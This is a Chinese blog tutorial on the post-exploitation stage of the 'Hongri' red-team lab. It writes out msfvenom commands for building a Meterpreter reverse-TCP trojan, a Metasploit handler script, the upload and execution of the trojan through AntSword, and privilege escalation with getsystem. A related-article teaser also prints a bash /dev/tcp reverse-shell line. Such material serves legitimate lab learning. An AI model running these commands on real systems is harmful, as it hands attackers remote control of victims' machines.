红日靶场----(四)1.后渗透利用阶段

2024-09-07 02:20
文章标签 靶场 渗透 阶段 红日

本文主要是介绍红日靶场----(四)1.后渗透利用阶段,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

使用Metasploit进入后渗透利用阶段

    一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器
    Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL)

常用选项-p   				//指定生成的Payload--list payload  	//列出所支持的Payload类型--list-options      //查看模块所支持的选项msfvenom -p windows/meterpreter/reverse_tcp --list-options  //查看模块所支持的选项-f     				      //指定生成的文件格式msfvenom --list formats   //查看所支持的文件格式常用的Windows Payload:windows/meterpreter/reverse_tcp(使用meteperter模块,建立一个反向的TCP连接)windows/meterpreter_reverse_tcpwindows/x64/meterpreter/reverse_tcp

1、生成反向木马

使用msfvenom生成一个木马程序 (msfvenom是有效载荷(payload)生成工具和编码工具的结合)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.195.20 LPORT=1234 -f exe > shell.exe

 2、在kali端创建侦听器

msf中相应的模块:exploit/multi/handler    
模块中所使用的payload应该与msfvenom中的payload保持一致

可以把命令写入到一个文件中,MSF

msfconsole -r
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.195.20
set LPORT 1234
set AutoRunScript post/windows/manage/migrate
exploit -j -z

然后使用 -r指定文件名,这样下次就不用一个一个写入了。

 3、把生成的shell.exe上传(部署)目标系统

通过蚁剑上传使用msfvenom生成的反向木马

(1)选中目标主机后右击

(2)进入文件系统后点击上传

 (3)找到反向木马后上传

4、 执行木马

dir看一下是否传输成功

直接执行该文件

这时候我们返回到MSF中就可以看到了,这时候我们可以使用getsystem直接提权。

这篇关于红日靶场----(四)1.后渗透利用阶段的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1143784

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

笔记整理—内核!启动!—kernel部分(2)从汇编阶段到start_kernel

kernel起始与ENTRY(stext),和uboot一样,都是从汇编阶段开始的,因为对于kernel而言,还没进行栈的维护,所以无法使用c语言。_HEAD定义了后面代码属于段名为.head .text的段。         内核起始部分代码被解压代码调用,前面关于uboot的文章中有提到过(eg:zImage)。uboot启动是无条件的,只要代码的位置对,上电就工作,kern

8阶段项目:五子棋(附带源码)

8阶段项目:五子棋 8.1-技术实现 1.静态变量 静态变量只能定义在类中,不能定义在方法中。静态变量可以在static修饰的方法中使用,也可以在非静态的方法中访问。主要解决在静态方法中不能访问非静态的变量。 2.静态方法 静态方法就相当于一个箱子,只是这个箱子中装的是代码,需要使用这些代码的时候,就把这个箱子放在指定的位置即可。   /*** 静态变量和静态方法*/public cl

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

2023 CCPC(秦皇岛)现场(第二届环球杯.第 2 阶段:秦皇岛)部分题解

所有题目链接:Dashboard - The 2023 CCPC (Qinhuangdao) Onsite (The 2nd Universal Cup. Stage 9: Qinhuangdao) - Codeforces 中文题面: contest-37054-zh.pdf (codeforces.com) G. Path 链接: Problem - G - Codeforces

【工具分享】针对加解密综合利用后渗透工具 - DecryptTools

下载地址: 链接: https://pan.quark.cn/s/2e451bd65d79 工具介绍 支持22种OA、CMS 加解密+密码查询功能 万户OA用友NC金蝶EAS蓝凌OA致远OA宏景ERP湖南强智金和jc6 瑞友天翼金和C6 Navicat华天动力 FinalShell亿赛通帆软报表H3C CASWeblogic金蝶云星空新华三IMC金盘 OP

【笔记-流程记录】从零开始做一个人形怪兽(建模阶段)

大型 1.第一步还是找素模,打开材质球,吸管点一下,就会出现素模的贴图,一共有四个 比如,点进去第一个,再点漫反射,再点psd就会得到相应的贴图 2.然后我们依然是面片然后插入参考图 如果透视窗口啥都没有,按g也不显示线框。那按下z(居中视图),然后再试一下按G显示栅格。 3.导入素模,重置变换 注释:重置变换是一个非常有用的功能,主要用于将对象的变换属性(位置、旋

[Android] [SnapdragonCamera] 单摄(横屏)阶段总结

在研高通平台的单摄项目中遇到了很多适配问题,做一下初步的总结,为今后遇到相似的问题,提供参考方案。          1. 横屏设置相机预览显示不正常               1.1问题现象                       1.2分析与解决              骁龙相机默认的预览方向是“portrait”。在横屏设备上显示的时候就会出现上面效果。实际

内网渗透—横向移动非约束委派约束委派

前言 今天依旧是横向移动的内容,委派主要分为三类非约束委派、约束委派、资源委派。今天主要讲前面两个内容,资源委派留到最后再讲。 实验环境 Web:192.168.145.137,192.168.22.28DC:192.168.22.30 非约束委派 原理 原理很简单,当DC访问具有非约束委派权限的主机A时,会把当前域管理员账户的TGT放在ST票据中,然后一起发给主机A。主机A会把TG

MySQL的知识阶段小总结

1.MySQL的库操作 1.1 MySQL 显示已建库操作  语法格式:show databases; 注意事项:是databases而不是database,要加s。 使用该SQL语句,可以查找当前服务器所有的数据库。huan 如上图所示,画红框的Java13和test113是用户自己创建好库, 画蓝框里的的数据库是MySQL自带的数据库。 1.2 MySQL建库语法和一些小细